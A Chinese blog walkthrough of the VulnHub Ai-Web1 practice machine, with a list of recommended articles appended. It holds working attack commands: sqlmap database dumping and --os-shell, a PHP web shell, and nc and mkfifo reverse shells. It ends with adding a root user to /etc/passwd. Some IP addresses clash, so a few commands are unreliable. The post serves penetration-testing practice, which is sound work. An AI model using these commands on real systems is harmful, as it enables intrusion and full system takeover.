vulnhub——Ai-Web1靶机渗透

Ai-Web1靶机渗透

靶机下载:

官网地址:https://www.vulnhub.com/entry/ai-web-1,353/

攻击机:kali2024

一、信息收集

发下目标主机的IP为:192.168.201.141

用nmap工具扫描一下对方主机和服务

发现他打开了80端口

发现搜不到于是我们用工具去扫描一下

我们发现了两个目录,于是我们去访问一下

我们再去扫一下另一个路径,我们看到了一个php文件

二、sql注入

这里我们尝试一下是否存在sql注入

我们用burp抓一下包

这里我们知道了他要上传的地方,我们可以利用sqlmap进行脱库

sqlmap -u "http://192.168.201.141/se3reTdir777/" --data "uid=1&Operation=Submit"  --dbs #列出库
 

sqlmap -u "http://192.168.201.141/se3reTdir777/" --data "uid=1&Operation=Submit"  -D aiweb1 --tables #列出表

sqlmap -u "http://192.168.0.104/se3reTdir777/" --data "uid=1&Operation=Submit"  -D aiweb1 -T user --columns #列出字段

sqlmap -u "http://192.168.0.104/se3reTdir777/" --data "uid=1&Operation=Submit"  --level=3 --os-shell #
 

选择php(default)custom location(s) 

输入获取到的绝对路径:/home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads/

三、文件上传

首先我们写一个一句话木马

四、反弹shell

1、kali本地监听:nc -lvvp 6666(或者nc -lnvp)

2、蚁剑终端上nc反弹:nc -e /bin/bash 192.168.201.136 6666(发现-e参数不可用)

3、rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.201.141 6666 >/tmp/f

4、python -c "import pty;pty.spawn('/bin/bash')"(python写交互)

五、提权

searchsploit linux kernel 4.15.0-58-generic 搜一下相关的内核漏洞发现没有可以利用的 文件

openssl passwd -1 -salt admin 123456

echo 'admin:$1$admin$LClYcRe.ee8dQwgrFc5nz.:0:0::/root:/bin/bash' >> /etc/passwd

相关推荐

最近更新

  1. docker php8.1+nginx base 镜像 dockerfile 配置

    2024-07-21 08:16:02       52 阅读
  2. Could not load dynamic library ‘cudart64_100.dll‘

    2024-07-21 08:16:02       54 阅读
  3. 在Django里面运行非项目文件

    2024-07-21 08:16:02       45 阅读
  4. Python语言-面向对象

    2024-07-21 08:16:02       55 阅读

热门阅读

  1. SDL常用结构体和函数接口

    2024-07-21 08:16:02       20 阅读
  2. 谷粒商城实战笔记-35-前端基础-ES6-模块化

    2024-07-21 08:16:02       17 阅读
  3. 分享一款开源免费的ftp服务工具——Pyftpsync

    2024-07-21 08:16:02       20 阅读
  4. 线程局部变量共享

    2024-07-21 08:16:02       18 阅读
  5. SQL Server报告服务的艺术:在SSRS中打造专业报告

    2024-07-21 08:16:02       18 阅读
  6. 探索Sklearn的分层抽样:数据科学中的精确艺术

    2024-07-21 08:16:02       18 阅读
  7. SQL Server分布式查询:跨数据库的无缝数据探索

    2024-07-21 08:16:02       19 阅读
  8. Vue的渲染函数:深入探索与应用实践

    2024-07-21 08:16:02       17 阅读